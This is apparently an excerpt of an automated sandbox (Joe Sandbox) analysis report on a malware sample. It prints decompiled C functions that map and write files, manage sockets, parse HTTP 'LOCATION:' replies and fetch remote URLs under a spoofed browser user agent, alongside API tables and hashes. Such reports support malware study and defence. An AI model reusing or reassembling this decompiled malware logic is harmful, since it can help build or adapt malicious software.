                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					UnmapViewOfFile(_v32);
                                                                                                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                                                    0x0040d1d8
                                                                                                                                                                                                                                                                                    0x0040d1dc
                                                                                                                                                                                                                                                                                    0x0040d1e3
                                                                                                                                                                                                                                                                                    0x0040d1ea
                                                                                                                                                                                                                                                                                    0x0040d20a
                                                                                                                                                                                                                                                                                    0x0040d211
                                                                                                                                                                                                                                                                                    0x0040d323
                                                                                                                                                                                                                                                                                    0x0040d327
                                                                                                                                                                                                                                                                                    0x0040d342
                                                                                                                                                                                                                                                                                    0x0040d349
                                                                                                                                                                                                                                                                                    0x0040d34b
                                                                                                                                                                                                                                                                                    0x0040d361
                                                                                                                                                                                                                                                                                    0x0040d36b
                                                                                                                                                                                                                                                                                    0x0040d36b
                                                                                                                                                                                                                                                                                    0x0040d375
                                                                                                                                                                                                                                                                                    0x0040d37a
                                                                                                                                                                                                                                                                                    0x0040d385
                                                                                                                                                                                                                                                                                    0x0040d385
                                                                                                                                                                                                                                                                                    0x0040d22b
                                                                                                                                                                                                                                                                                    0x0040d232
                                                                                                                                                                                                                                                                                    0x0040d319
                                                                                                                                                                                                                                                                                    0x0040d31d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d31d
                                                                                                                                                                                                                                                                                    0x0040d24a
                                                                                                                                                                                                                                                                                    0x0040d251
                                                                                                                                                                                                                                                                                    0x0040d30f
                                                                                                                                                                                                                                                                                    0x0040d313
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d257
                                                                                                                                                                                                                                                                                    0x0040d263
                                                                                                                                                                                                                                                                                    0x0040d26d
                                                                                                                                                                                                                                                                                    0x0040d277
                                                                                                                                                                                                                                                                                    0x0040d27c
                                                                                                                                                                                                                                                                                    0x0040d27f
                                                                                                                                                                                                                                                                                    0x0040d286
                                                                                                                                                                                                                                                                                    0x0040d29f
                                                                                                                                                                                                                                                                                    0x0040d2b9
                                                                                                                                                                                                                                                                                    0x0040d2be
                                                                                                                                                                                                                                                                                    0x0040d2c1
                                                                                                                                                                                                                                                                                    0x0040d2c8
                                                                                                                                                                                                                                                                                    0x0040d2d6
                                                                                                                                                                                                                                                                                    0x0040d2db
                                                                                                                                                                                                                                                                                    0x0040d2ee
                                                                                                                                                                                                                                                                                    0x0040d2f0
                                                                                                                                                                                                                                                                                    0x0040d2f6
                                                                                                                                                                                                                                                                                    0x0040d2fb
                                                                                                                                                                                                                                                                                    0x0040d2fe
                                                                                                                                                                                                                                                                                    0x0040d2fe
                                                                                                                                                                                                                                                                                    0x0040d2f0
                                                                                                                                                                                                                                                                                    0x0040d2c8
                                                                                                                                                                                                                                                                                    0x0040d286
                                                                                                                                                                                                                                                                                    0x0040d309
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d309

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D204
                                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D225
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D244
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D25D
                                                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D309
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040D313
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040D31D
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D33C
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040D361
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040D36B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWrite
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 171974401-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 42738202a373e86da52720a5def95d02706c9cd7ae46f1d94619cfd4c34c3cbf
                                                                                                                                                                                                                                                                                    • Instruction ID: 3921fc4700ee4b190ae2af8b7d894abc0534e186cae3a84a50511f4350192fbd
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42738202a373e86da52720a5def95d02706c9cd7ae46f1d94619cfd4c34c3cbf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97512CB5E00208FBDB14DFE4CC59BEEBB74AB48704F208569E611772C0D7B96A45CB98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                    			E0040E840(void* __eax, long __ebx, void* __ecx, short _a4, short _a6) {
                                                                                                                                                                                                                                                                                    				long _v4;
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                                                    				void* _t108;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t108 = __eax;
                                                                                                                                                                                                                                                                                    				_t106 = __ecx;
                                                                                                                                                                                                                                                                                    				if(_a4 != 0 || __ebx == 0) {
                                                                                                                                                                                                                                                                                    					InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                                    					_a4 = 1;
                                                                                                                                                                                                                                                                                    					_t59 =  *((intOrPtr*)(_t106 + 0x260));
                                                                                                                                                                                                                                                                                    					 *((char*)(_t106 + 0x275)) = 1;
                                                                                                                                                                                                                                                                                    					_a6 = 0;
                                                                                                                                                                                                                                                                                    					__imp__#21(_t59, 0xffff, 0x80,  &_a4, 4);
                                                                                                                                                                                                                                                                                    					__imp__#3( *((intOrPtr*)(_t106 + 0x260)));
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t106 + 0x260)) = 0xffffffff;
                                                                                                                                                                                                                                                                                    					return _t59;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				InterlockedExchange(_t106 + 4, E0040BE60());
                                                                                                                                                                                                                                                                                    				_t64 =  *((intOrPtr*)(_t108 + 0x18));
                                                                                                                                                                                                                                                                                    				if(_t64 == 0) {
                                                                                                                                                                                                                                                                                    					if( *((char*)(_t106 + 0x275)) == 0) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) + __ebx;
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t108 + 0x28)) >=  *((intOrPtr*)(_t108 + 0x24))) {
                                                                                                                                                                                                                                                                                    							InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                                    							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                                                                                                                                                                                                                    							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                                                                                                                                                                                                                    							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                                                                                                                                                                                                                    							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                                                                                                                                                                                                                    							_v8 =  *((intOrPtr*)(_t108 + 0x30));
                                                                                                                                                                                                                                                                                    							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                                                                                                                                                                                                                    							_v4 =  *((intOrPtr*)(_t108 + 0x28));
                                                                                                                                                                                                                                                                                    							return E0040E220(2, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t108 + 0x20)) + __ebx;
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t108 + 0x1c)) =  *((intOrPtr*)(_t108 + 0x1c)) - __ebx;
                                                                                                                                                                                                                                                                                    							_push(_t106);
                                                                                                                                                                                                                                                                                    							return E0040E5C0(_t108);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						return InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t73 = _t64 - 1;
                                                                                                                                                                                                                                                                                    					if(_t73 != 0) {
                                                                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                                                                    						return _t73;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t106 + 0x275)) == _t73) {
                                                                                                                                                                                                                                                                                    							InterlockedDecrement(_t106 + 0x21c);
                                                                                                                                                                                                                                                                                    							InterlockedExchangeAdd( *((intOrPtr*)(_t106 + 0x27c)) + 0x44, __ebx);
                                                                                                                                                                                                                                                                                    							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                                                                                                                                                                                                                    							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                                                                                                                                                                                                                    							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                                                                                                                                                                                                                    							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                                                                                                                                                                                                                    							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                                                                                                                                                                                                                    							_v8 = _t106 + 8;
                                                                                                                                                                                                                                                                                    							_v4 = __ebx;
                                                                                                                                                                                                                                                                                    							E0040E220(3, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                                                                                                                                                                                                                    							_t73 = E0040E7D0(_t106);
                                                                                                                                                                                                                                                                                    							if(_t73 != 0) {
                                                                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								 *((char*)(_t106 + 0x275)) = 1;
                                                                                                                                                                                                                                                                                    								return _t73;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							return InterlockedDecrement(_t106 + 0x21c);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                                                                    0x0040e84a
                                                                                                                                                                                                                                                                                    0x0040e84c
                                                                                                                                                                                                                                                                                    0x0040e84e
                                                                                                                                                                                                                                                                                    0x0040e9d6
                                                                                                                                                                                                                                                                                    0x0040e9ed
                                                                                                                                                                                                                                                                                    0x0040e9f2
                                                                                                                                                                                                                                                                                    0x0040ea00
                                                                                                                                                                                                                                                                                    0x0040ea07
                                                                                                                                                                                                                                                                                    0x0040ea0c
                                                                                                                                                                                                                                                                                    0x0040ea19
                                                                                                                                                                                                                                                                                    0x0040ea1f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ea1f
                                                                                                                                                                                                                                                                                    0x0040e866
                                                                                                                                                                                                                                                                                    0x0040e86f
                                                                                                                                                                                                                                                                                    0x0040e872
                                                                                                                                                                                                                                                                                    0x0040e935
                                                                                                                                                                                                                                                                                    0x0040e947
                                                                                                                                                                                                                                                                                    0x0040e950
                                                                                                                                                                                                                                                                                    0x0040e96b
                                                                                                                                                                                                                                                                                    0x0040e983
                                                                                                                                                                                                                                                                                    0x0040e98d
                                                                                                                                                                                                                                                                                    0x0040e994
                                                                                                                                                                                                                                                                                    0x0040e998
                                                                                                                                                                                                                                                                                    0x0040e9a2
                                                                                                                                                                                                                                                                                    0x0040e9b1
                                                                                                                                                                                                                                                                                    0x0040e9c0
                                                                                                                                                                                                                                                                                    0x0040e9d1
                                                                                                                                                                                                                                                                                    0x0040e952
                                                                                                                                                                                                                                                                                    0x0040e952
                                                                                                                                                                                                                                                                                    0x0040e955
                                                                                                                                                                                                                                                                                    0x0040e958
                                                                                                                                                                                                                                                                                    0x0040e966
                                                                                                                                                                                                                                                                                    0x0040e966
                                                                                                                                                                                                                                                                                    0x0040e937
                                                                                                                                                                                                                                                                                    0x0040e946
                                                                                                                                                                                                                                                                                    0x0040e946
                                                                                                                                                                                                                                                                                    0x0040e878
                                                                                                                                                                                                                                                                                    0x0040e878
                                                                                                                                                                                                                                                                                    0x0040e87b
                                                                                                                                                                                                                                                                                    0x0040ea2e
                                                                                                                                                                                                                                                                                    0x0040ea2e
                                                                                                                                                                                                                                                                                    0x0040e881
                                                                                                                                                                                                                                                                                    0x0040e887
                                                                                                                                                                                                                                                                                    0x0040e8a3
                                                                                                                                                                                                                                                                                    0x0040e8b4
                                                                                                                                                                                                                                                                                    0x0040e8cc
                                                                                                                                                                                                                                                                                    0x0040e8d6
                                                                                                                                                                                                                                                                                    0x0040e8e0
                                                                                                                                                                                                                                                                                    0x0040e8e4
                                                                                                                                                                                                                                                                                    0x0040e8e8
                                                                                                                                                                                                                                                                                    0x0040e8fa
                                                                                                                                                                                                                                                                                    0x0040e906
                                                                                                                                                                                                                                                                                    0x0040e90a
                                                                                                                                                                                                                                                                                    0x0040e914
                                                                                                                                                                                                                                                                                    0x0040e91b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e921
                                                                                                                                                                                                                                                                                    0x0040e921
                                                                                                                                                                                                                                                                                    0x0040e92d
                                                                                                                                                                                                                                                                                    0x0040e92d
                                                                                                                                                                                                                                                                                    0x0040e889
                                                                                                                                                                                                                                                                                    0x0040e89b
                                                                                                                                                                                                                                                                                    0x0040e89b
                                                                                                                                                                                                                                                                                    0x0040e887
                                                                                                                                                                                                                                                                                    0x0040e87b

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 0040E866
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E890
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E8A3
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 0040E8B4
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E93B
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E9D6
                                                                                                                                                                                                                                                                                    • setsockopt.WS2_32 ref: 0040EA0C
                                                                                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 0040EA19
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BE60: NtQuerySystemTime.NTDLL ref: 0040BE6A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BE60: RtlTimeToSecondsSince1980.NTDLL ref: 0040BE78
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 671207744-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4dfa08af28426b4d1d77860e0f1456d557a2ffbbd5efd9c9b0045f898d83f82c
                                                                                                                                                                                                                                                                                    • Instruction ID: b9f556da3bb5aac27c1329fbefbdde51c01563ae05ed193aa0a017dd72204b88
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dfa08af28426b4d1d77860e0f1456d557a2ffbbd5efd9c9b0045f898d83f82c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D951BD75608701ABC704DF29D888B97FBE4BF88314F008A2EE49D93361D775A558CB96
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                    			E0040C490(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                    				char _v1028;
                                                                                                                                                                                                                                                                                    				char _v1029;
                                                                                                                                                                                                                                                                                    				intOrPtr _v1036;
                                                                                                                                                                                                                                                                                    				char* _v1040;
                                                                                                                                                                                                                                                                                    				char* _v1044;
                                                                                                                                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                                                                                                                                    				intOrPtr _t29;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t20 = __eax;
                                                                                                                                                                                                                                                                                    				_v1029 = 0;
                                                                                                                                                                                                                                                                                    				_v1036 = 0;
                                                                                                                                                                                                                                                                                    				while(_v1036 < 2) {
                                                                                                                                                                                                                                                                                    					__imp__#17(_a4,  &_v1028, 0x400, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_t20 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						_v1029 = 1;
                                                                                                                                                                                                                                                                                    						if(StrCmpNIA( &_v1028, "HTTP/1.1 200 OK", 0xf) == 0) {
                                                                                                                                                                                                                                                                                    							_v1040 = StrStrIA( &_v1028, "LOCATION: ");
                                                                                                                                                                                                                                                                                    							if(_v1040 != 0) {
                                                                                                                                                                                                                                                                                    								_v1044 = _v1040 + 0xa;
                                                                                                                                                                                                                                                                                    								_t29 = E0040B290(_v1044, _v1044, StrChrA(_v1044, 0xd) - _v1044);
                                                                                                                                                                                                                                                                                    								_t37 = _t37 + 8;
                                                                                                                                                                                                                                                                                    								 *_a8 = _t29;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t20 = _v1036 + 1;
                                                                                                                                                                                                                                                                                    					_v1036 = _t20;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v1029;
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    0x0040c490
                                                                                                                                                                                                                                                                                    0x0040c499
                                                                                                                                                                                                                                                                                    0x0040c4a0
                                                                                                                                                                                                                                                                                    0x0040c4bb
                                                                                                                                                                                                                                                                                    0x0040c4de
                                                                                                                                                                                                                                                                                    0x0040c4e7
                                                                                                                                                                                                                                                                                    0x0040c4f6
                                                                                                                                                                                                                                                                                    0x0040c513
                                                                                                                                                                                                                                                                                    0x0040c527
                                                                                                                                                                                                                                                                                    0x0040c534
                                                                                                                                                                                                                                                                                    0x0040c53f
                                                                                                                                                                                                                                                                                    0x0040c562
                                                                                                                                                                                                                                                                                    0x0040c567
                                                                                                                                                                                                                                                                                    0x0040c56d
                                                                                                                                                                                                                                                                                    0x0040c56d
                                                                                                                                                                                                                                                                                    0x0040c534
                                                                                                                                                                                                                                                                                    0x0040c4e9
                                                                                                                                                                                                                                                                                    0x0040c4ee
                                                                                                                                                                                                                                                                                    0x0040c4ee
                                                                                                                                                                                                                                                                                    0x0040c4b2
                                                                                                                                                                                                                                                                                    0x0040c4b5
                                                                                                                                                                                                                                                                                    0x0040c4b5
                                                                                                                                                                                                                                                                                    0x0040c57d

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C4DE
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040C4EE
                                                                                                                                                                                                                                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C50B
                                                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C521
                                                                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040C54E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Sleeprecvfrom
                                                                                                                                                                                                                                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                                                                                                                    • API String ID: 668330359-3973262388
                                                                                                                                                                                                                                                                                    • Opcode ID: d874aecdcf10d4b5be9618b38b24f3ae2d323a3f92cb0c3b0d60b3f526243bf0
                                                                                                                                                                                                                                                                                    • Instruction ID: 8bedf7fd65d1d668ead3ec736ca13f9a22eb8deece20412d9194f72f96c2fcee
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d874aecdcf10d4b5be9618b38b24f3ae2d323a3f92cb0c3b0d60b3f526243bf0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 062142B494022CEBDB20CB64DC85BE97774AB04708F1086E9E709B72C0D7B95AC68F5C
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040D440(char* _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				char _v9;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void _v20;
                                                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v9 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36", 1, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    					_v8 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    						_v24 = 4;
                                                                                                                                                                                                                                                                                    						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
                                                                                                                                                                                                                                                                                    						if(_v20 > 0x1388 && _v20 !=  *_a8) {
                                                                                                                                                                                                                                                                                    							 *_a8 = _v20;
                                                                                                                                                                                                                                                                                    							_v9 = 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						InternetCloseHandle(_v8);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    				return _v9;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x0040d446
                                                                                                                                                                                                                                                                                    0x0040d45d
                                                                                                                                                                                                                                                                                    0x0040d464
                                                                                                                                                                                                                                                                                    0x0040d47c
                                                                                                                                                                                                                                                                                    0x0040d483
                                                                                                                                                                                                                                                                                    0x0040d485
                                                                                                                                                                                                                                                                                    0x0040d49f
                                                                                                                                                                                                                                                                                    0x0040d4ac
                                                                                                                                                                                                                                                                                    0x0040d4be
                                                                                                                                                                                                                                                                                    0x0040d4c0
                                                                                                                                                                                                                                                                                    0x0040d4c0
                                                                                                                                                                                                                                                                                    0x0040d4c8
                                                                                                                                                                                                                                                                                    0x0040d4c8
                                                                                                                                                                                                                                                                                    0x0040d4d2
                                                                                                                                                                                                                                                                                    0x0040d4d2
                                                                                                                                                                                                                                                                                    0x0040d4dd
                                                                                                                                                                                                                                                                                    0x0040d4e9

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040D457
                                                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D476
                                                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040D49F
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040D4C8
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040D4D2
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D4DD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36, xrefs: 0040D452
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    • API String ID: 2743515581-858318475
                                                                                                                                                                                                                                                                                    • Opcode ID: bf6bfaf4f45310fce9545a939de9a762d1e78cec5d6cbb91b294f9239cf924bb
                                                                                                                                                                                                                                                                                    • Instruction ID: 741b2aa36f5f9633f3a5325d1023e1587c91f2e0dd76465297faea143a49f62d
